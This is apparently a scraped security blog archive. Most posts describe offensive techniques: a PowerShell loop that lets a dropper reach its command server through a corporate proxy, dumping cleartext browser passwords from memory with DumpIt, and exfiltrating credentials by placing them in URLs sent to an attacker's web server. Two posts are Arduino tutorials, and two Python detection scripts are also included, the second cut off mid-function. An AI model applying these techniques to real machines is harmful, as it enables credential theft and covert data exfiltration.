<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1-PMMET2iBjSLuFJa3dRJUpYzt3xntFYxZF3M5ul-ed5oLexrWKWaDaU2qzxHT3crlpRx1JkQWY_hInweI_gDSm3ur0_igCJm6Q6DZG3dDI7feNWpgrWo8J4mGFmiu47x3IcPPA7mHGV0/s1600/2.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1-PMMET2iBjSLuFJa3dRJUpYzt3xntFYxZF3M5ul-ed5oLexrWKWaDaU2qzxHT3crlpRx1JkQWY_hInweI_gDSm3ur0_igCJm6Q6DZG3dDI7feNWpgrWo8J4mGFmiu47x3IcPPA7mHGV0/s400/2.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLdkQjOvV7NAt83egHXyvdArAYh-cXZaPE5_CVK5YKre_gJG28D5fZKFem1fAs0w2JNePFLzWbILOjbZX7raPI-ek51a3a-xdkZvR4YGhQ2w4MI0dtXjXvbU5hviPCEY4dfw3g1D2BG3k3/s1600/3.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="283" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLdkQjOvV7NAt83egHXyvdArAYh-cXZaPE5_CVK5YKre_gJG28D5fZKFem1fAs0w2JNePFLzWbILOjbZX7raPI-ek51a3a-xdkZvR4YGhQ2w4MI0dtXjXvbU5hviPCEY4dfw3g1D2BG3k3/s400/3.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg42rzA411-jmjV9ppcZlkwALyc6cORcD536MLgz6DZCpXXCokGWq6PXo0C81Sfjy7FCEs-OtOtQgCPiZ4aTezcYYAXQP_L5LMy7ye6VfWl7-D6btPzTDjwGJsOK8Lk2hIW8PFB1FOvCxI3/s1600/4.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="281" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg42rzA411-jmjV9ppcZlkwALyc6cORcD536MLgz6DZCpXXCokGWq6PXo0C81Sfjy7FCEs-OtOtQgCPiZ4aTezcYYAXQP_L5LMy7ye6VfWl7-D6btPzTDjwGJsOK8Lk2hIW8PFB1FOvCxI3/s400/4.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgguboQEnofd8e-jGw0cvgFaoJNadMur0x71ReAaEGRmREjEo14xM8bYOkcXfAgza2sao3XXke1K3GDZ50SYN5sWdBBA9F_5Ena8RRamRUwPcCoY9q9jiANuJhLfM6x-5A3IYjODX8bT6J-/s1600/6.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgguboQEnofd8e-jGw0cvgFaoJNadMur0x71ReAaEGRmREjEo14xM8bYOkcXfAgza2sao3XXke1K3GDZ50SYN5sWdBBA9F_5Ena8RRamRUwPcCoY9q9jiANuJhLfM6x-5A3IYjODX8bT6J-/s400/6.PNG" width="400" /></a></div>
<div>
<br /></div>
<div>
<br />
<br />
<u><b>Good references :</b></u><br />
https://github.com/PowerShellMafia/PowerSploit<br />
https://adsecurity.org/?page_id=1821<br />
https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1<br />
https://www.sans.org/reading-room/whitepapers/forensics/mimikatz-overview-defenses-detection-36780<br />
<br /></div>
<div>
<br /></div>
</div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-28984092625986702392016-05-05T21:23:00.001-07:002016-05-05T21:23:34.359-07:00Authenticate to proxy with current credentials<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Droppers deployed on victim machines attempt to connect to the C&C centre; however, in a corporate network the proxy comes into the picture.<br />
<br />
The PowerShell code below authenticates to the proxy with the current user's credentials and fetches the contents of "http://microsoft.com".<br />
<br />
<br />
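# $i is never incremented, so the loop body repeats indefinitely (one request every 5 seconds)<br />
for($i=0; $i -le 0; $i)<br />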
{<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>$wc = New-Object System.Net.WebClient<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>$wc.DownloadString('http://microsoft.com')<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>Start-Sleep -s 5<br />
<br />
}<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFnKXG2olVpaAAZBgBz0jZ2ZwA4VV8dBVL3FFCQuKbPbmzOk0sTNRA9nms7u5zUU8y4lH7enPrkwjUBD-pplOA4OU5nFLhY2lr3cPNT26qqeoLktYWLtTFWqK_NFVkTFCyIVqM1FBYqxxh/s1600/proxy.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFnKXG2olVpaAAZBgBz0jZ2ZwA4VV8dBVL3FFCQuKbPbmzOk0sTNRA9nms7u5zUU8y4lH7enPrkwjUBD-pplOA4OU5nFLhY2lr3cPNT26qqeoLktYWLtTFWqK_NFVkTFCyIVqM1FBYqxxh/s400/proxy.png" width="400" /></a></div>
<br />
The PowerShell script can further be turned into an executable .exe file with PS2EXE.<br />
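<br />
Seen from the proxy, the loop above is one authenticated request to the same host roughly every 5 seconds. The Python below is an added example, not code from the original post: it flags that kind of fixed-interval pattern in proxy records. The record layout, the thresholds and the sample lines are constructed assumptions.<br />

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample proxy records (not from the post). Assumed layout:
# ISO timestamp, proxy-authenticated user, client IP, destination host.
SAMPLE_LOG = r"""
2016-05-05T09:00:00 CORP\alice 10.0.0.21 microsoft.com
2016-05-05T09:00:05 CORP\alice 10.0.0.21 microsoft.com
2016-05-05T09:00:10 CORP\alice 10.0.0.21 microsoft.com
2016-05-05T09:00:15 CORP\alice 10.0.0.21 microsoft.com
2016-05-05T09:00:20 CORP\alice 10.0.0.21 microsoft.com
2016-05-05T09:00:26 CORP\alice 10.0.0.21 microsoft.com
2016-05-05T09:00:31 CORP\alice 10.0.0.21 microsoft.com
2016-05-05T09:00:36 CORP\alice 10.0.0.21 microsoft.com
2016-05-05T09:00:03 CORP\bob 10.0.0.34 news.example.com
2016-05-05T09:00:04 CORP\bob 10.0.0.34 news.example.com
2016-05-05T09:00:40 CORP\bob 10.0.0.34 news.example.com
2016-05-05T09:02:10 CORP\bob 10.0.0.34 news.example.com
2016-05-05T09:02:11 CORP\bob 10.0.0.34 news.example.com
2016-05-05T09:07:30 CORP\bob 10.0.0.34 news.example.com
2016-05-05T09:01:00 CORP\carol 10.0.0.40 microsoft.com
2016-05-05T09:01:05 CORP\carol 10.0.0.40 microsoft.com
2016-05-05T09:01:10 CORP\carol 10.0.0.40 microsoft.com
"""


def parse_records(text):
    """Parse whitespace-separated records; skip blank or malformed lines."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        try:
            ts = datetime.fromisoformat(parts[0])
        except ValueError:
            continue
        records.append((ts, parts[1], parts[2], parts[3]))
    return records


def find_beacons(records, min_requests=6, max_cv=0.1):
    """Flag (user, client, host) groups whose request spacing is near-constant.

    The coefficient of variation (standard deviation / mean) of the gaps
    between consecutive requests is close to 0 for a fixed sleep loop and
    large for human browsing. Both thresholds are assumptions to tune.
    """
    groups = defaultdict(list)
    for ts, user, client, host in records:
        groups[(user, client, host)].append(ts)

    hits = []
    for (user, client, host), stamps in groups.items():
        if len(stamps) < min_requests:
            continue  # too few samples to judge regularity
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue  # every request in the same second: a burst, not a timer
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            hits.append({"user": user, "client": client, "host": host,
                         "requests": len(stamps),
                         "mean_interval_s": avg, "cv": cv})
    return sorted(hits, key=lambda h: h["cv"])


if __name__ == "__main__":
    for hit in find_beacons(parse_records(SAMPLE_LOG)):
        print(hit)
```

The third sample user makes only three evenly spaced requests and is deliberately left unflagged, because that is too little data to call a timer.<br />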
<br />
<br /></div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-21312786884994211552016-04-30T12:16:00.004-07:002016-04-30T23:45:22.503-07:00Arduino - Display Character on 4 Digit 7 Segment Display<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Hi,<br />
<br />
Going one step further in learning Arduino UNO, I wanted to print the word "HACK" on a display module with 4 digits and 7 segments; you can check the specification here: <a href="http://www.dx.com/p/arduino-compatible-4-digit-12-pin-display-module-140220#.VyUEEXF96M8">Link</a><br />
<br />
I was struggling to understand how it works and which pins to connect where on the Arduino board.<br />
<br />
As it's a digital display, we will use the digital pins of the Arduino board, from 1 to 13.<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUrbKpsKoadpf6idV52aUPI9SFcjk3FqI1a_bxOyZq6QCZ60LscnM3lj9lF6YDY3hDYrqfBtr8X_R7QGYWkhZ8XsqzE5DZ5phHYDXFSd3-IodnORXhSnUn7d7ljzFtAlHHqv8h1d1pPWSa/s1600/20160501_002546.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUrbKpsKoadpf6idV52aUPI9SFcjk3FqI1a_bxOyZq6QCZ60LscnM3lj9lF6YDY3hDYrqfBtr8X_R7QGYWkhZ8XsqzE5DZ5phHYDXFSd3-IodnORXhSnUn7d7ljzFtAlHHqv8h1d1pPWSa/s400/20160501_002546.jpg" width="400" /></a></div>
<br />
This is how the segments are labelled on the actual display unit, from a to g:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0bkDi6hgHf73RQZ6IQjmeaGg_8S_6U5-jU0B7eRfP7dLIO75siGAwOmvV8xPty9kkczBbKWpJI7RiOeffCMJ6wY4dt1OPOl0XVspeM2EmjxW0Z5Nf_8k3ySkt6TH-9N_jY6cl6gjjuMty/s1600/arduino_3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0bkDi6hgHf73RQZ6IQjmeaGg_8S_6U5-jU0B7eRfP7dLIO75siGAwOmvV8xPty9kkczBbKWpJI7RiOeffCMJ6wY4dt1OPOl0XVspeM2EmjxW0Z5Nf_8k3ySkt6TH-9N_jY6cl6gjjuMty/s400/arduino_3.png" width="400" /></a></div>
<br />
Now, how do you set up the circuit?<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLyvbHoNREEwc8c9ZzJbPgAnePXwqteyiwaLi3CEcd4N38l6H13iKb-k8pvTFsmlm4igfq4gdOsDx1uKnXodOn_szp_ReZZaS6taBS0Q8YCtR4pFpTsxcErJcyI-4WTzBgmtDWhZng0On2/s1600/arduino_3.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLyvbHoNREEwc8c9ZzJbPgAnePXwqteyiwaLi3CEcd4N38l6H13iKb-k8pvTFsmlm4igfq4gdOsDx1uKnXodOn_szp_ReZZaS6taBS0Q8YCtR4pFpTsxcErJcyI-4WTzBgmtDWhZng0On2/s400/arduino_3.png" width="343" /></a><br />
<br />
The pin structure and its functionality are as follows:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjcyd30eEtfrYtbCuS1XhRnwyM6R-JzOpZsd4huC8G-bNG2GSQXw1R8ewxnpDZWILSTXKnQ_O07rLAcQoSIY70NwOd1JhRnbiX2eFum3AK7pGsShmuTG2SQqrei48X78CZcP1rUyE0HPrW/s1600/pin+structure.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjcyd30eEtfrYtbCuS1XhRnwyM6R-JzOpZsd4huC8G-bNG2GSQXw1R8ewxnpDZWILSTXKnQ_O07rLAcQoSIY70NwOd1JhRnbiX2eFum3AK7pGsShmuTG2SQqrei48X78CZcP1rUyE0HPrW/s400/pin+structure.png" width="400" /></a></div>
<br />
The key is the logic! If you want to display anything on Digit 1 of the display unit, you need to enable Arduino Pin 2 and set its voltage to HIGH, and set the other digits to LOW.<br />
<br />
<u>Core Program Logic </u><br />
<u><br /></u>
1. Turn on the first digit, turn off all other digits<br />
2. Turn on the segments we need for the first digit and set delay to 5<br />
3. Turn off all digits, turn on the second digit<br />
4. Turn on the segments we need for the second digit and set delay to 5<br />
5. Turn off all digits, turn on the third digit<br />
6. Turn on the segments we need for the third digit and set delay to 5<br />
7. Turn off all digits, turn on the fourth digit<br />
8. Turn on all the segments we need for the fourth digit and set delay to 5<br />
<u><br /></u>
<u><br /></u>
<div>
<a href="https://drive.google.com/file/d/0B4fmHoqW8qjTSHRtbkFIWU94VXM/view?usp=sharing">View Complete Program</a> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX35GleewZ3Rmb8rzl9ngSZVZMj1anxwV7D3qH0AnHDVKr8o51TtLa0u-9nZhl3000NGKvn_ZgdNyKxRqrTZQHAZ2HLAsSRIOdAQIOePWVmntmtEfFHWisue7WoxMW6IpWKTEJ-f1-XFcc/s1600/20160430_234845.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX35GleewZ3Rmb8rzl9ngSZVZMj1anxwV7D3qH0AnHDVKr8o51TtLa0u-9nZhl3000NGKvn_ZgdNyKxRqrTZQHAZ2HLAsSRIOdAQIOePWVmntmtEfFHWisue7WoxMW6IpWKTEJ-f1-XFcc/s400/20160430_234845.jpg" width="400" /></a></div>
<br />
Hope this helps...!<br />
<br /></div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-63692030810067769022016-04-30T12:08:00.001-07:002016-04-30T12:08:31.052-07:00Arduino Uno Tutorial - Blinking LED <div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Hi,<br />
<br />
I have never worked on Arduino before, so it's really interesting!<br />
<br />
Just to give you a basic intro: we can use an Arduino board to connect multiple sensors, LEDs and display units and program them to do what we want!<br />
<br />
To start with, let's blink an LED!<br />
<br />
<br />
<br />
<ol style="text-align: left;">
<li>Take any sample LED. In simple terms, it always has 2 "legs", one long and one short: long leg = positive (+), short leg = negative (-)</li>
<li>For this project, insert the short leg of your LED into the ground socket "GND" of your Arduino board and the long leg into socket no. 13</li>
<li>Now you're all set for programming your Arduino board.</li>
<li>You need the Arduino IDE for writing a program, and it's similar to C programming!</li>
<li>Download your IDE from https://www.arduino.cc/en/Main/Software</li>
<li>The setup() function is used for setting up the environment, like declaring variables</li>
<li>The loop() function is used for executing code continuously</li>
</ol>
<div>
void setup() {</div>
<div>
<div>
// initialize digital pin 13 as an output.</div>
<div>
pinMode(13, OUTPUT);</div>
<div>
}</div>
<div>
<br /></div>
<div>
// the loop function runs over and over again forever</div>
<div>
void loop() {</div>
<div>
  digitalWrite(13, HIGH);   // turn the LED on (HIGH is the voltage level)</div>
<div>
  delay(100);              // wait 100 milliseconds</div>
<div>
  digitalWrite(13, LOW);    // turn the LED off by making the voltage LOW</div>
<div>
  delay(100);              // wait 100 milliseconds</div>
<div>
}</div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
That's it, now it's time to run your first program on Arduino UNO.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Blue LED - Short Leg connected to GND and Long Leg connected to pin 13 of Arduino</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZrKwLnNia8JfwNSQ3cumXn6tTK9TsTXwY-VSBjxUE2aJV-bmqkLGbevsbJd7vBKHttwumYXZiZHxasWae5TrEGV92DgBb1utCTLBeXn1q_mJFBhZWTrmzxb9colRVe8ozzPqLueiDyGXz/s1600/20160501_002546.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZrKwLnNia8JfwNSQ3cumXn6tTK9TsTXwY-VSBjxUE2aJV-bmqkLGbevsbJd7vBKHttwumYXZiZHxasWae5TrEGV92DgBb1utCTLBeXn1q_mJFBhZWTrmzxb9colRVe8ozzPqLueiDyGXz/s400/20160501_002546.jpg" width="400" /></a></div>
<div>
<br /></div>
<div>
Arduino IDE - Program to Blink LED connected on pin 13</div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyK3bRLWbUOhVnugwTaBpdmiAlywbIFexvKZE-7TsC4OE8GCLaoX2HSxlVFsQ1BJymdJJej8SSmArGuaueHieRHDAsOrrq_tv5dhFgcxnWsRLvycjxhCtUFpfH_TaTiYSHPRRdRIJ9EpzF/s1600/Arduino_1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyK3bRLWbUOhVnugwTaBpdmiAlywbIFexvKZE-7TsC4OE8GCLaoX2HSxlVFsQ1BJymdJJej8SSmArGuaueHieRHDAsOrrq_tv5dhFgcxnWsRLvycjxhCtUFpfH_TaTiYSHPRRdRIJ9EpzF/s400/Arduino_1.png" width="400" /></a></div>
<div>
<br /></div>
<div>
LED Started Blinking!....</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiE8_KR0KCISuiVNMt0DKFkJLp2ihLK3wCdW5WUKnQhnG2PE5HDLIHIRELm2waWgTRokHIy5S_cwn001jpw1mp0QiJ2NbUrV81hb1frweWoAQwFBieMVrAN0eEKbl2DuEVxMw3dS91naL7n/s1600/20160501_002524.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiE8_KR0KCISuiVNMt0DKFkJLp2ihLK3wCdW5WUKnQhnG2PE5HDLIHIRELm2waWgTRokHIy5S_cwn001jpw1mp0QiJ2NbUrV81hb1frweWoAQwFBieMVrAN0eEKbl2DuEVxMw3dS91naL7n/s400/20160501_002524.jpg" width="300" /></a></div>
<div>
<br /></div>
<div>
Will post more on Arduino Board soon...</div>
</div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-38050057135681754762016-04-19T08:17:00.002-07:002016-04-19T08:30:31.992-07:00Dumping Clear Text browser passwords from Windows Memory<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Hi,<br />
<br />
We all know the Mimikatz tool is used for dumping Windows credentials from memory.<br />
What if we want to retrieve passwords from a web browser or other applications from memory?<br />
E.g. google.com, facebook.com or any other website or corporate web portal.<br />
<br />
Most of the time in a corporate network, employees log in to the corporate portal with their domain passwords.<br />
If you can dump memory from a machine and analyse it to get web passwords in clear text, then this trick really helps!<br />
<br />
Download the tool called Dumpit from <a href="https://drive.google.com/open?id=0B4fmHoqW8qjTTTdhN2NHZ0s0STQ">here</a><br />
<br />
Let's imagine a scenario where the victim has logged in to Gmail.com<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWE1JwUApAy1zs2mYnmYvs7JR1aVnhs61-lTxUzn8I9SFmwY-cypKFicWJ3waZ6nXgipUBuJU1DmJPqwH4H71flWEfi5_9lAzN3mXNQzcy_7SuwmvQmyUmF7gR2ze3BkhMiFMlRIgpuWc3/s1600/pass_2.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="153" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWE1JwUApAy1zs2mYnmYvs7JR1aVnhs61-lTxUzn8I9SFmwY-cypKFicWJ3waZ6nXgipUBuJU1DmJPqwH4H71flWEfi5_9lAzN3mXNQzcy_7SuwmvQmyUmF7gR2ze3BkhMiFMlRIgpuWc3/s400/pass_2.PNG" width="400" /></a></div>
<br />
The attacker executed Dumpit.exe with admin rights<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTV1OcnpOSa78-9YB7UVnbj7okJ1fGZ0z_Dr_9pettRYfdLfxAdS655b74GdwCItJkJtWb04Kavpx28PspGdSRH7P_2NSKrKYksT2KmQjOqpj8_-f1vgZorAuBCWRpCcXkxE4WiIyqKbDK/s1600/pass_3.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTV1OcnpOSa78-9YB7UVnbj7okJ1fGZ0z_Dr_9pettRYfdLfxAdS655b74GdwCItJkJtWb04Kavpx28PspGdSRH7P_2NSKrKYksT2KmQjOqpj8_-f1vgZorAuBCWRpCcXkxE4WiIyqKbDK/s400/pass_3.PNG" width="400" /></a></div>
<br />
You can simply analyse the .raw dump file with the Windows "find" or "findstr" command,<br />
and you can get all passwords in clear text!<br />
<br />
In the screenshot below you can see the clear text passwords for gmail.com entered earlier in the browser!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJih_PSz2mMTf31xm6_J1FMe4KyO4Q3uRU2ZDbHBXhXd0Ix2093aoiIlKPh8uAbOC6cbEkpQPXI_OwCdTJ49gJ_xkFKdfIU1ykbnxuVxc9JOOGveeQEpzbRQUBR6Kt1yi4zcvPv1Gx75pJ/s1600/pass_%2521.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJih_PSz2mMTf31xm6_J1FMe4KyO4Q3uRU2ZDbHBXhXd0Ix2093aoiIlKPh8uAbOC6cbEkpQPXI_OwCdTJ49gJ_xkFKdfIU1ykbnxuVxc9JOOGveeQEpzbRQUBR6Kt1yi4zcvPv1Gx75pJ/s400/pass_%2521.PNG" width="400" /></a></div>
<br />
<br /></div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-54335527854844820102016-04-19T06:37:00.001-07:002016-04-19T06:39:34.439-07:00Data Exfiltration via HTTP / Web server logs<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Hi ,<br />
<br />
I was just working on a project and got an idea of exfiltrating data via HTTP!<br />
This might already be known to you, but I am adding it here for documentation purposes.<br />
<br />
Scenario:<br />
What if you have access to a victim machine and quickly want to exfiltrate some very important figures, key data or maybe anything else?<br />
<br />
The first step is to copy all your data; in this case the attacker wants to exfiltrate some victim credentials.<br />
<br />
Simply paste the data after the attacker's domain name / IP; this will generate log entries on the attacker's web server.<br />
The attacker will simply open the web server log file and read the exfiltrated data, i.e. the credentials.<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7ydWmZijo8RJXjvw0NW8gg5aKBIB5RhPhEvmd0ot7Klu-lGyBWx1fNA1NPgz3u_en-1zUW8zcjlhYYvN12cs5mVEz-dK73fJTe6kNaR-58YyBeGCmk7YXBRJgVjr4ymkMlpJDkqLKi99q/s1600/data_1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="90" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7ydWmZijo8RJXjvw0NW8gg5aKBIB5RhPhEvmd0ot7Klu-lGyBWx1fNA1NPgz3u_en-1zUW8zcjlhYYvN12cs5mVEz-dK73fJTe6kNaR-58YyBeGCmk7YXBRJgVjr4ymkMlpJDkqLKi99q/s400/data_1.png" width="400" /></a></div>
<br />
The attacker opens the web server logs and looks for the exfiltrated data<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5WPlOQdHBgspACZ18WW-gQ4fxWlFdMhOl1vYW5K3D1L9_8wz5T8JeoI2Dswv8LjN9jOGbk6pmsDUlB0PkqDEijH7ajvl4kSvyQR4u1NDiGVQtNidICqgfoiMDw5RmhWCJNwrDffYJzJf-/s1600/data_2.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5WPlOQdHBgspACZ18WW-gQ4fxWlFdMhOl1vYW5K3D1L9_8wz5T8JeoI2Dswv8LjN9jOGbk6pmsDUlB0PkqDEijH7ajvl4kSvyQR4u1NDiGVQtNidICqgfoiMDw5RmhWCJNwrDffYJzJf-/s400/data_2.PNG" width="400" /></a></div>
<br />
The attacker replaces the characters that were URL-encoded by default and views the credentials<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPcjipbbCHWRX1WqFRTHR93j4i6Ik0cK6riB_4iXMbHrMBBQrWMFKTkfXw96zMhyphenhyphenejqubGmw5SexOTxkTx6l8i99nMtp0Ck0tEDOHRHMBux_HEeH2PEXvavMmmM1u8p6Jt-CnJWoexQZhk/s1600/data_3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPcjipbbCHWRX1WqFRTHR93j4i6Ik0cK6riB_4iXMbHrMBBQrWMFKTkfXw96zMhyphenhyphenejqubGmw5SexOTxkTx6l8i99nMtp0Ck0tEDOHRHMBux_HEeH2PEXvavMmmM1u8p6Jt-CnJWoexQZhk/s400/data_3.png" width="400" /></a></div>
<br />
Although it's a very simple trick, it works in a real environment!<br />
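<br />
The same request that lands in the attacker's web server log also passes through the organisation's own outbound proxy, where it can be caught. The Python below is an added example, not code from the original post: it decodes the URL path of each logged request and flags credential-style data placed after the host name. The log layout (Common Log Format with an absolute URL), the rules and the sample lines are constructed assumptions.<br />

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed forward-proxy log lines (not from the post).
SAMPLE_LOG = """
10.0.0.21 - alice [19/Apr/2016:06:30:01 -0700] "GET http://intranet.example.com/index.html HTTP/1.1" 200 5120
10.0.0.21 - alice [19/Apr/2016:06:31:12 -0700] "GET http://203.0.113.10/username=admin%20password=S3cret! HTTP/1.1" 404 210
10.0.0.34 - bob [19/Apr/2016:06:32:40 -0700] "GET http://cdn.example.net/assets/app.min.js?v=20160419 HTTP/1.1" 200 88211
10.0.0.34 - bob [19/Apr/2016:06:33:02 -0700] "GET http://files.example.org/docs/Annual%20Report%202015.pdf HTTP/1.1" 200 40960
10.0.0.34 - bob [19/Apr/2016:06:33:30 -0700] "CONNECT mail.example.com:443 HTTP/1.1" 200 0
"""

LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Words that label a credential when followed by "=" or ":".
CRED_MARKER = re.compile(
    r"\b(?:pass(?:word|wd)?|pwd|user(?:name)?|login)\s*[=:]", re.IGNORECASE
)
# Generic "key=value" or "key:value" token.
KEY_VALUE = re.compile(r"[\w.@-]+\s*[=:]\s*[^\s/]+")


def scan_proxy_log(text):
    """Return one finding per request whose decoded URL path carries
    credential-style data. Unparseable lines are skipped."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        if m["method"] == "CONNECT":
            # HTTPS tunnels expose only host:port to the proxy, so there is
            # no path to inspect without TLS inspection.
            continue
        url = urlsplit(m["url"])
        # Only the path is inspected: that is where the post places the data,
        # and query strings routinely carry legitimate key=value pairs.
        path = unquote(url.path)  # undo the browser's percent-encoding
        reasons = []
        if CRED_MARKER.search(path):
            reasons.append("credential keyword in URL path")
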